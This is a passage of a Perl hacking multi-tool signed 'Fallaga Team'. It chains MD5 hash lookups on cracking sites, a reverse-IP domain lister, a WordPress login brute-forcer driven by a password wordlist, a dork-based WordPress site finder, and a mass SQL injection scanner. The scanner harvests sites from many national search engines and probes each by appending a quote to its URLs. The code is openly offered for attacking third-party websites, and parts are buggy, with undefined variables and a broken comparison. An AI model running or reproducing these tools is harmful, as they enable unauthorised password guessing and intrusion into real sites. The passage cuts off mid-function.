1210. $url = "http://www.hashkiller.co.uk/md5-decrypter.aspx";
1211. $lwp = LWP::UserAgent->new();
1212. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1213. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Submit"]);
1214.  
1215. print "5 hashkiller.co.uk               ----  ";
1216. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1217. print "Result : Hash not found!\n";
1218. } else {
1219. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1220. print "Result : $1\n";
1221. }
1222. $url = "https://crackstation.net";
1223. $lwp = LWP::UserAgent->new();
1224. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1225. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack Hashes"]);
1226.  
1227. print "6 crackstation.net               ----  ";
1228. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1229. print "Result : Hash not found!\n";
1230. } else {
1231. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1232. print "Result : $1\n";
1233. }
1234. $url = "crackhash.com";
1235. $lwp = LWP::UserAgent->new();
1236. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1237. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Start Cracking"]);
1238.  
1239. print "7 crackhash.com                  ----  ";
1240. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1241. print "Result : Hash not found!\n";
1242. } else {
1243. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1244. print "Result : $1\n";
1245. }
1246. $url = "www.md5.net/md5-cracker/";
1247. $lwp = LWP::UserAgent->new();
1248. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1249. $request = $lwp->post($url, ["hash" => $hash, "text" => "submit"]);
1250.  
1251. print "8 www.md5.net                    ----  ";
1252. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1253. print "Result : Hash not found!\n";
1254. } else {
1255. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1256. print "Result : $1\n";
1257. }
1258. $url = "http://www.md5this.com/";
1259. $lwp = LWP::UserAgent->new();
1260. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1261. $request = $lwp->post($url, ["hash" => $hash, "option" => "com_search"]);
1262.  
1263. print "9 www.md5this.com                ----  ";
1264. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1265. print "Result : Hash not found!\n";
1266. } else {
1267. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1268. print "Result : $1\n";
1269. }
1270. $url = "http://www.hash-cracker.com/";
1271. $lwp = LWP::UserAgent->new();
1272. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1273. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack!!"]);
1274.  
1275. print "10 www.hash-cracker.com          ----  ";
1276. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1277. print "Result : Hash not found!\n";
1278. } else {
1279. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1280. print "Result : $1\n";
1281. }
1282. $url = substr($url, $1 + 13);
1283. open (txt,">>md5.txt");
1284. print txt  $1,"\n";
1285. close(txt);
1286. }}
1287. }
1288. if($targett eq '17')
1289. {
1290. system('cls');
1291. system('title Reverse IP');
1292.                     {
1293. use HTTP::Request;
1294. use LWP::UserAgent;
1295. if($^O =~ /Win/){
1296.  
1297.    system("cls");
1298.    system("color a");
1299.    system("title Reverse D0main YougetSignal By 1337");
1300.  
1301. }else{
1302.  
1303.    system("clear");
1304. }
1305. print q{
1306.  
1307.                            *-------------------------------*
1308.                            |       reverse          ******
1309.                            |    YouGetSignal       ****
1310.                            | result in log.txt    ***
1311.                            *---------------------*
1312. };
1313. print "\n[*]Use Proxy ? (y/n):";
1314. my $chose = <>;
1315. chomp($chose);
1316.  
1317. if(lc($chose) eq 'y') {
1318. sleep (3);
1319. print "\n\n [+]Put Proxy (ex: 127.0.0.1:80) :";
1320. my $proxy = <>;
1321. chomp($proxy);
1322. print "\n\n[*]Put Host or IP (host without http://) :";
1323. my $host = <>;
1324. chomp($host);
1325. my $file = "log.txt";
1326. $ua = LWP::UserAgent->new;
1327. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
1328. $ua->proxy('http', 'http://'.$proxy.'');
1329. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
1330. {
1331.         remoteAddress => $host,
1332. }
1333. );
1334.  
1335. my $resulta = $zz->content;
1336. while ($resulta =~ m/\[([^\]]*)\]/g)
1337. {
1338.         $zeb = $1;
1339.         $zeb =~ m/\"(.*?)\", \"?\"/g;
1340. open(a, ">>log.txt");
1341. print a "http://$1/\n";
1342. close(a);
1343. }
1344. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
1345. sleep(2);
1346.   print "\n  [*]Total website Recolted: $1\n";
1347. }
1348. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
1349. sleep(1);
1350.  
1351.   print "\n  [*]IP serveur: $1\n";
1352. }
1353. print "\n[+]All website Reversed.\n";
1354. }
1355. if(lc($chose) eq 'n') {
1356.  
1357. print "\nPut Host or IP (host without http://) :";
1358. my $host = <>;
1359. chomp($host);
1360. my $file = "log.txt";
1361. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
1362. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
1363. {
1364.         remoteAddress => $host,
1365. }
1366. );
1367.  
1368. my $resulta = $zz->content;
1369. while ($resulta =~ m/\[([^\]]*)\]/g)
1370. {
1371.         $zeb = $1;
1372.         $zeb =~ m/\"(.*?)\", \"?\"/g;
1373. open(a, ">>log.txt");
1374. print a "http://$1/\n";
1375. close(a);
1376. }
1377. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
1378. sleep(2);
1379.   print "\n  [*]Total website Recolted: $1\n";
1380. }
1381. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
1382. sleep(1);
1383.  
1384.   print "\n  [*]IP serveur: $1\n";
1385. }
1386. print "\n[+]All website Reversed.\n";
1387. }}
1388. }
1389. if($targett eq '14')
1390. {
1391. system('cls');
1392. system('title Wordpres BruteForce');
1393.                     {
1394. use LWP::UserAgent;
1395. use HTTP::Request;
1396. use HTTP::Request::Common qw(POST);
1397. use HTTP::Cookies;
1398.  
1399. if($^O =~ /Win/){
1400. system("cls");
1401. }else{
1402. system("clear");
1403. }
1404. $ua = LWP::UserAgent->new(keep_alive => 1);
1405. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
1406. $ua->timeout (20);
1407. $ua->cookie_jar(
1408. HTTP::Cookies->new(
1409. file => 'cookies.txt',
1410. autosave => 1
1411. )
1412. );
1413.  
1414. $target = $ARGV[0];
1415. $user = $ARGV[1];
1416. $wordlist = $ARGV[2];
1417. $wpsub = 'wp-submit';
1418. $redirect = 'http://'.$target.'/wp-admin/';
1419. print "
1420.  Wordpress Bruteforce
1421.                         ^__^
1422.                         (oo)\_________
1423.                         (__)\Wordpress)\/\
1424.                             ||-----w |
1425.  Fallaga Team  Here!!   ||      ||
1426. \n ======================================================
1427. =======================================================\n";
1428. chomp $target;
1429.  
1430. print "[+] Enter Wordpress Site: ";
1431. chomp ($target = <STDIN>);
1432. chomp $user;
1433.  
1434. print "[+] Enter Wordpress User: ";
1435. chomp ($user = <STDIN>);
1436. chomp $dork;
1437.  
1438. print "[+] Enter Wordlist: ";
1439. chomp ($wordlist = <STDIN>);
1440. if ($target !~ /^http:\/\//){
1441. print q(
1442.  Wordpress Bruteforce
1443.  Contact me at : fallag.crx@mail.ru
1444.  Fallaga Team  Here!!
1445. );
1446. $target = 'http://' . $target;
1447. }
1448. if ($target !~ /\/wp-login.php/){
1449. $target = $target . '/wp-login.php';
1450. }
1451. $notpon = "\n[-] 404 wordlist not found!! \n";
1452. open(a,"<$wordlist") or die "$notpon";
1453. print "\nBruteforce info....
1454. \nSite     : $target
1455. \nUsername : $user
1456. \nWordlist : Found!\n
1457. [+] Bruteforce In Action....\n\n";
1458. sleep(2);
1459. while(<a>){
1460. chomp($_);
1461.  
1462. my $response
1463. = $ua->post($target,
1464. { log => $user,
1465. pwd => $_,
1466. $wpsub => 'Log in',
1467. redirect_to => $redirect,
1468. testcookie => '1'
1469. });
1470.  
1471. my $code = $response->code;
1472. print "[?] Testing $_.....\n";
1473. if ($code == 403){
1474. print "\n\n\t[-] Access Forbidden!!\n";
1475. print "\t---==FAllaga Team Here==--- \n\n";
1476. exit;
1477. }
1478. if($code == 302){
1479. print "\n\n\t[*] PASSWORD FOUND: $_\n";
1480. print "\t---==Fallaga Team Here==--- \n\n";
1481. exit;
1482. }
1483. print "[-] Failed!!\n";
1484. }
1485. print "[-] Bruteforce failed!!
1486. \n[!] Your wordlist is sucks!!\n";
1487. exit;
1488. }}
1489. if($targett eq '13')
1490. {
1491. system('cls');
1492. system('title Wordpress Site Finder');
1493.                     {
1494. use HTTP::Request;
1495. use LWP::UserAgent;
1496. use HTTP::Request::Common qw(POST);
1497. use HTTP::Request::Common qw(GET);
1498. use IO::Socket;
1499. use Socket;
1500. use POSIX qw(strftime);
1501.  
1502. if($^O =~ /Win/){
1503. system("cls");
1504. }else{
1505. system("clear");
1506. }
1507.  
1508. $dork = $ARGV[0];
1509. my %hosts;
1510. my $time =localtime();
1511. print"
1512.  WordPress Site finder
1513.                         ^__^
1514.                         (oo)\________
1515.                         (__)\ Scan   )\/\
1516.                             ||----w |
1517.  Fallaga  Team Here!!   ||     ||
1518.  perl $0 <dork> \n";
1519. chomp $dork;
1520.  
1521. print "[+] Enter Wordpress Dork: ";
1522. chomp ($dork = <STDIN>);
1523. print q(
1524.  WordPress site finder
1525.  Contact me at : fallag.crx<at>mail.ru
1526.  Fallaga Team Here!!
1527. );
1528. print "\n[!]Scanning info
1529. [!]Localtime      : $time
1530. [!]Scanning using : $dork
1531. [!]Scanning started.....\n";
1532. #Search Engine
1533.     my @bing = &bing($dork);
1534. print "\n[+] Get ".scalar(@bing)." Sites \n";
1535. push(my @tot, @bing);
1536. my @puliti=&unici(@tot);
1537. print "\n[+] Find ".scalar(@tot)." Sites and Cleaned : ".scalar(@puliti)." for $dork \n";
1538. my $uni=scalar(@puliti);
1539. foreach my $sito (@puliti)
1540. {
1541. $contatore++;
1542. if ($contatore %30==0){
1543. print "\n[?] Checking ".$contatore." of ".$uni. " Sites \n";
1544. }
1545. if ($contatore==$uni-1){
1546. print "\n[!] Scan finish for $dork \n";
1547. }
1548. my $wp="http://".$sito;
1549. my $req=HTTP::Request->new(GET=>$wp);
1550. my $ua = LWP::UserAgent->new(keep_alive => 1);
1551. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12","Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5","Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1","Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9","Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3");
1552. $ua->timeout(10);
1553. my $response=$ua->request($req);
1554. #You can add the wordpress search here
1555. if ($response->is_success) {
1556.  if( $response->content =~ /Powered by WordPress/ ||
1557. $response->content =~ /Site by WordPress/ ||
1558. $response->content =~ /WordPress/ ||
1559. $response->content =~ /wordpress/ ||
1560. $response->content =~ /WORDPRESS/ ||
1561. $response->content =~ /Theme by/ ||
1562. $response->content =~ /Site Theme by/ ||
1563. $response->content =~ /WordPress Theme by/ ||
1564. $response->content =~ /Copyright Theme/ ||
1565. $response->content =~ /Theme for WordPress/ ||
1566. $response->content =~ /Blog pada WordPress.com/ ||
1567. $response->content =~ /Blog at WordPress.com/ ||
1568. $response->content =~ /The Morning After Theme/ ||
1569. $response->content =~ /The Twenty Ten Theme/ ||
1570. $response->content =~ /Proudly powered by WordPress/ ||
1571. $response->content =~ /Plainbox Theme/ ||
1572. $response->content =~ /Wordpress Theme/ ||
1573. $response->content =~ /Modicus Remix Theme/ ||
1574. $response->content =~ /Nishita Photo Blog Theme/ ||
1575. $response->content =~ /Theme by MyThemeShop/ ||
1576. $response->content =~ /Theme by/ ||
1577. $response->content =~ /Futurosity Aperio Prototype/ ||
1578. $response->content =~ /Get the Theme for Free/ ||
1579. $response->content =~ /Brightness Theme/ ||
1580. $response->content =~ /Noname Theme/ ||
1581. $response->content =~ /Overstand Theme/ ||
1582. $response->content =~ /Disire Portfolio/ ||
1583. $response->content =~ /Delicacy Food/ ||
1584. $response->content =~ /Diary Theme/ ||
1585. $response->content =~ /Facebook Theme/ ||
1586. $response->content =~ /NuBlue Theme/ ||
1587. $response->content =~ /GreenLife Theme/ ||
1588. $response->content =~ /JEEZ Business Theme/ ||
1589. $response->content =~ /Favor HD Magazine Theme/ ||
1590. $response->content =~ /Mason Jar Theme/ ||
1591. $response->content =~ /Radion Theme/ ||
1592. $response->content =~ /Clearly Theme/ ||
1593. $response->content =~ /Kreativo Theme/ ||
1594. $response->content =~ /My Baby Theme/ ||
1595. $response->content =~ /Design Agency Theme/ ||
1596. $response->content =~ /Isabelle Theme/ ||
1597. $response->content =~ /Cotton Theme/ ||
1598. $response->content =~ /ProjectFlow Theme/ ||
1599. $response->content =~ /WordPress.com/ ||
1600. $response->content =~ /Free Theme by/ ||
1601. $response->content =~ /Paid Theme by/ ||
1602. $response->content =~ /Get Free Theme/ ||
1603. $response->content =~ /Get Paid Theme/ ||
1604. $response->content =~ /Oleh WordPress/ ||
1605. $response->content =~ /INDEX OF/ ||
1606. $response->content =~ /Plugins WordPress/ ||
1607. $response->content =~ /readme.html/ ||
1608. $response->content =~ /WordPress version 3.3.1/ ||
1609. $response->content =~ /WordPress version 3./ ||
1610. $response->content =~ /WordPress site/ ||
1611. $response->content =~ /Get Theme/ ||
1612. $response->content =~ /Blog at Word/ ||
1613. $response->content =~ /WordPress/){
1614. my $hs=geths($print); $hosts{$hs}++;
1615. if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
1616. print "\n[+] Positive Wordpress site : $wp \n";
1617. }}
1618. elsif($re =~ /not found/ ||
1619. $re =~ /404 NOT FOUND/ ||
1620. $re =~ /Not Found/ ||
1621. $re =~ /NOT FOUND/ ||
1622. $re =~ /404/ ||
1623. $re =~ /Error/ ||
1624. $re =~ /error/ ||
1625. $re =~ /ERROR/ ||
1626. $re =~ /Page Not Found/)
1627. {
1628. my $hs=geths($print); $hosts{$hs}++;
1629. if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
1630. print "\n[-] Negative Wordpress site : $wp \n";
1631. }}
1632. }}
1633. print "\n\t\t --==Fallaga Team Here==--\n";
1634. exit;
1635. #Sub Search Engine
1636. ################Bing
1637. sub bing() {
1638.     my @lst;
1639.     my $key = $_[0];
1640.     for (my $b=0; $b<=300; $b+=300) {
1641.         my $go = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$b."&FORM=PERE");
1642.         my $res = &query($go);
1643.         if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$b=300;}
1644.         while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
1645.             if ($1 !~ /bing\.com/) {
1646.             my $k = $1;
1647.                 my @grep = &links($k);
1648.                 push(@lst,@grep);
1649.             }
1650.         }
1651.     }
1652.     return @lst;
1653. }
1654. ################################################
1655.  
1656. sub query($){
1657. my $url=$_[0];
1658. $url=~s/http:\/\///;
1659. my $host=$url;
1660. my $query=$url;
1661. my $page="";
1662. $host=~s/href=\"?http:\/\///;
1663. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1664. $query=~s/$host//;
1665. if ($query eq "") {$query="/";};
1666. eval {
1667. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
1668. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
1669. my @r = <$sock>;
1670. $page="@r";
1671. close($sock);
1672. };
1673. return $page;
1674. }
1675.  
1676. sub unici{
1677. my @unici = ();
1678. my %visti = ();
1679. foreach my $elemento ( @_ )
1680. {
1681. next if $visti{ $elemento }++;
1682. push @unici, $elemento;
1683. }
1684. return @unici;
1685. }
1686.  
1687. sub geths(){
1688. my $host=$_[0];
1689. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1690. return $host;
1691. }
1692.  
1693. sub key(){
1694. my $chiave=$_[0];
1695. $chiave =~ s/ /\+/g;
1696. $chiave =~ s/:/\%3A/g;
1697. $chiave =~ s/\//\%2F/g;
1698. $chiave =~ s/&/\%26/g;
1699. $chiave =~ s/\"/\%22/g;
1700. $chiave =~ s/,/\%2C/g;
1701. $chiave =~ s/\\/\%5C/g;
1702. return $chiave;
1703. }
1704.  
1705. sub links()
1706. {
1707. my @l;
1708. my $link=$_[0];
1709. my $host=$_[0];
1710. my $hdir=$_[0];
1711. $hdir=~s/(.*)\/[^\/]*$/\1/;
1712. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1713. $host.="/";
1714. $link.="/";
1715. $hdir.="/";
1716. $host=~s/\/\//\//g;
1717. $hdir=~s/\/\//\//g;
1718. $link=~s/\/\//\//g;
1719. push(@l,$link,$host,$hdir);
1720. return @l;
1721. }
1722. }}
1723. if($targett eq '1x')
1724. {
1725. system('title About Me');
1726. print "Creator : Fallag crx\n";
1727. print "Mail : Fallag crx[at]mail[.]ru | Facebook ID : X.cripton.x \n";
1728. print "Special Thanks to : Fallaga Team | x_spider_tn | Storm Shadow| HAnnibal-XYZ| TN Ghost | CollabTn| © Tn. White/Black  HAckers © \n";
1729. system("pause");
1730. }
1731. if($targett eq '12')
1732. {
1733. system('cls');
1734. system('title Sqli Scanner');
1735.                    {
1736. use HTTP::Request;
1737. use LWP::UserAgent;
1738. use IO::Socket;
1739. use Socket;
1740. use URI::Escape;
1741. use POSIX qw(strftime);
1742.  
1743. if ($^O =~ /Win/){
1744. system ('cls');
1745. }else{
1746. system ('clear');
1747. }
1748. my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime();
1749. my $uagent    = "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1";
1750. print q {
1751. SQLi scanner
1752. };
1753. print q(
1754. SQLi scanner
1755. );
1756. print "---------------------------------------------------------
1757. [!] Options
1758. [!] example
1759. [!] Dork : product.php?id= +site:il +you have an error in your sql
1760. ---------------------------------------------------------\n";
1761. print "[?] Dork for scanning : ";
1762. my $dork = <STDIN>;
1763. chomp $dork;
1764. $ngitung = 0;
1765. my %hosts;
1766. print "---------------------------------------------------------
1767. [!] Scanning info
1768. ---------------------------------------------------------
1769. [+] Time : $hour:$min:$sec
1770. [+] Dork : $dork
1771. ---------------------------------------------------------
1772. [!] Scanning started....
1773. ---------------------------------------------------------";
1774. #Search Engine
1775. my @bing = &bing($dork);
1776. print "\n[+] Bing      get ".scalar(@bing)." Sites";
1777. my @irlandia = &irlandia($dork);
1778. print "\n[+] Irlanda  get ".scalar(@irlandia)." Sites";
1779. my @indonesia = &indonesia($dork);
1780. print "\n[+] Indonesia get ".scalar(@indonesia)." Sites";
1781. my @thailand = &thailand($dork);
1782. print "\n[+] Thailand  get ".scalar(@thailand)." Sites";
1783. my @argentina = &argentina($dork);
1784. print "\n[+] Argentina get ".scalar(@argentina)." Sites";
1785. my @singapura = &singapura($dork);
1786. print "\n[+] Singapura get ".scalar(@singapura)." Sites";
1787. my @malaysia = &malaysia($dork);
1788. print "\n[+] Malaysia  get ".scalar(@malaysia)." Sites";
1789. my @vietnam = &vietnam($dork);
1790. print "\n[+] Vietnam   get ".scalar(@vietnam)." Sites";
1791. my @rusia = &rusia($dork);
1792. print "\n[+] Russia    get ".scalar(@rusia)." Sites";
1793. my @czech = &czech($dork);
1794. print "\n[+] Czech     get ".scalar(@czech)." Sites";
1795. my @belanda = &belanda($dork);
1796. print "\n[+] Belanda   get ".scalar(@belanda)." Sites";
1797. my @australia = &australia($dork);
1798. print "\n[+] Australia get ".scalar(@australia)." Sites";
1799. my @brasil = &brasil($dork);
1800. print "\n[+] Brasil    get ".scalar(@brasil)." Sites";
1801. my @kanada = &canada($dork);
1802. print "\n[+] Canada    get ".scalar(@kanada)." Sites";
1803. my @jerman = &jerman($dork);
1804. print "\n[+] Germany   get ".scalar(@jerman)." Sites";
1805. my @spanyol = &spanyol($dork);
1806. print "\n[+] Spanyol   get ".scalar(@spanyol)." Sites";
1807. my @perancis = &perancis($dork);
1808. print "\n[+] Perancis  get ".scalar(@perancis)." Sites";
1809. my @italia = &italia($dork);
1810. print "\n[+] Talia     get ".scalar(@italia)." Sites";
1811. my @inggris = &inggris($dork);
1812. print "\n[+] Inggris   get ".scalar(@inggris)." Sites";
1813. my @turki = &turki($dork);
1814. print "\n[+] Turkiya   get ".scalar(@turki)." Sites";
1815. my @polandia = &polandia($dork);
1816. print "\n[+] Polandia  get ".scalar(@polandia)." Sites";
1817. my @filipina = &filipina($dork);
1818. print "\n[+] philipine get ".scalar(@filipina)." Sites";
1819. my @peru = &peru($dork);
1820. print "\n[+] Peru      get ".scalar(@peru)." Sites";
1821. my @hongkong = &hongkong($dork);
1822. print "\n[+] Hongkong  get ".scalar(@hongkong)." Sites";
1823. my @finlandia = &finlandia($dork);
1824. print "\n[+] Finlandia get ".scalar(@finlandia)." Sites";
1825. my @yunani = &yunani($dork);
1826. print "\n[+] Yunan     get ".scalar(@yunani)." Sites";
1827. my @kolombia = &kolombia($dork);
1828. print "\n[+] Colombia  get ".scalar(@kolombia)." Sites";
1829. my @taiwan = &taiwan($dork);
1830. print "\n[+] Taiwan    get ".scalar(@taiwan)." Sites";
1831. my @swiss = &swiss($dork);
1832. print "\n[+] Swiss     get ".scalar(@swiss)." Sites";
1833. my @mexico = &mexico($dork);
1834. print "\n[+] Meksiko   get ".scalar(@mexico)." Sites";
1835. my @korea = &korea($dork);
1836. print "\n[+] Korea     get ".scalar(@korea)." Sites";
1837. my @india = &india($dork);
1838. print "\n[+] India     get ".scalar(@india)." Sites";
1839. my @swedia = &swedia($dork);
1840. print "\n[+] Swedia    get ".scalar(@swedia)." Sites";
1841. my @Uk = &Uk(dork);
1842. print "\n[+] U.kingdom get ".scalar(@Uk)." Sites";
1843. my @french = &Israel($dork);
1844. print "\n[+] Israel    get ".scalar(@israel)." Sites";
1845. my @french = &french($dork);
1846. print "\n[+] french    get ".scalar(@french)." Sites";
1847. my @Tunisia = &Tunisia($dork);
1848. print "\n[+] Tunisia   get ".scalar(@Tunisia)." Sites";
1849. print "\n---------------------------------------------------------";
1850. print "\n[!] Searching vulnerable sites";
1851. print "\n[!] Please wait...\n";
1852. print "---------------------------------------------------------\n";
1853. push(my @tot, @bing, @irlandia, @indonesia, @thailand, @argentina, @singapura, @malaysia, @vietnam, @swedia, @rusia, @czech, @belanda,
1854. @australia, @brasil, @kanada, @jerman, @spanyol, @perancis, @italia, @inggris, @turki, @polandia, @filipina, @peru, @hongkong, @yunani,
1855. @finlandia, @kolombia, @taiwan, @swiss, @mexico, @korea, @india, @irlandia,@Tunisia,@french,@israel,@Uk);
1856. my @bersih=&clean(@tot);
1857. my $akhir=scalar(@bersih);
1858. foreach my $situs (@bersih) {
1859. $ngitung++;
1860. if ($ngitung==$akhir-1){
1861. print "\n[!] Scan finish for $dork :D";
1862. }
1863. my $expl="http://".$situs."'";
1864. my $mysql = "MySQL";
1865. my $mssql = "MsSQL";
1866. my $msacc = "MsAcces";
1867. my $string = getcontent($expl);
1868. if ( $string =~ m/You have an error in your SQL syntax/i || $string =~ m/Query failed/i || $string =~ m/SQL query failed/i ){
1869. print "[*] MySQL vuln for SQLi on $situs\n";
1870. printlog ("
1871. Time     : $hour:$min:$sec
1872. Site     : $situs
1873. Database : $mysql\n");
1874. }
1875. elsif ( $string =~ m/ODBC SQL Server Driver/i || $string =~ m/Unclosed quotation mark/i || $string =~ m/Microsoft OLE DB Provider for/i ){
1876. print "[*] MsSQL vuln for SQLi on $vuln\n";
1877. printlog ("
1878. Time     : $hour:$min:$sec
1879. Site     : $situs
1880. Database : $mssql\n");
1881. }
1882. elsif ( $string =~ m/Microsoft JET Database/i || $string =~ m/ODBC Microsoft Access Driver/i ){
1883. print "[*] MsAcces vuln for SQLi on $vuln\n";
1884. printlog ("
1885. Time     : $hour:$min:$sec
1886. Site     : $situs
1887. Database : $msacc\n");
1888. }
1889. }
1890. exit;
1891. #Search Engine
1892. sub bing() {
1893.    my @list;
1894.    my $key = $_[0];
1895.    for (my $i=1; $i<=200; $i+=10) {
1896.        my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
1897.        my $res = &search_engine_query($search);
1898.        while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
1899.                        my $link = $1;
1900.            if ($link !~ /google/) {
1901.                my @grep = &links($link);
1902.                push(@list,@grep);
1903.            }
1904.        }
1905.    }
1906.    return @list;
1907. }
1908.  
1909. sub indonesia() {
1910.    my @list;
1911.  my $key = $_[0];
1912.  my $b   = 0;
1913.    for (my $i=1; $i<=200; $i+=100) {
1914.        my $search = ("http://id.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1915.        my $res = &search_engine_query($search);
1916.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1917.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1918.            }
1919.        }
1920.    } return @list;
1921. }
1922.  
1923. sub india() {
1924.    my @list;
1925.  my $key = $_[0];
1926.  my $b   = 0;
1927.    for (my $i=1; $i<=200; $i+=100) {
1928.        my $search = ("http://in.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1929.        my $res = &search_engine_query($search);
1930.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1931.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1932.            }
1933.        }
1934.    } return @list;
1935. }
1936.  
1937. sub irlandia() {
1938.    my @list;
1939.  my $key = $_[0];
1940.  my $b   = 0;
1941.    for (my $i=1; $i<=200; $i+=100) {
1942.        my $search = ("http://ie.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1943.        my $res = &search_engine_query($search);
1944.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1945.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1946.            }
1947.        }
1948.    } return @list;
1949. }
1950.  
1951. sub korea() {
1952.    my @list;
1953.  my $key = $_[0];
1954.  my $b   = 0;
1955.    for (my $i=1; $i<=200; $i+=100) {
1956.        my $search = ("http://kr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1957.        my $res = &search_engine_query($search);
1958.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1959.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1960.            }
1961.        }
1962.    } return @list;
1963. }
1964.  
1965. sub thailand() {
1966.    my @list;
1967.  my $key = $_[0];
1968.  my $b   = 0;
1969.    for (my $i=1; $i<=200; $i+=100) {
